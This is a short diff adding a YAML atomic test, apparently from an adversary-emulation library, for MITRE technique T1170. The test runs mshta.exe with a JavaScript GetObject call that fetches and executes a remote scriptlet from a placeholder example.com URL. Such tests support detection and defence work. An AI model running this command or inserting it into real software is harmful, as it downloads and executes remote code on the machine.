add ${T}

atomics/t1170/t1170.yaml

@@ -0,0 +1,18 @@
+attack_technique: T1170
+display_name: Mshta
+
+atomic_tests:
+- name: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
+  description: |
+    Test execution of a remote script using mshta.exe
+  supported_platforms:
+    - windows
+  input_arguments:
+    file_url:
+      description: location of the payload
+      type: Url
+      default: https://www.example.com/mshta.sct
+  executor:
+    name: command_prompt
+    command: |
+      mshta.exe javascript:a=GetObject("script:#{file_url}").Exec();close();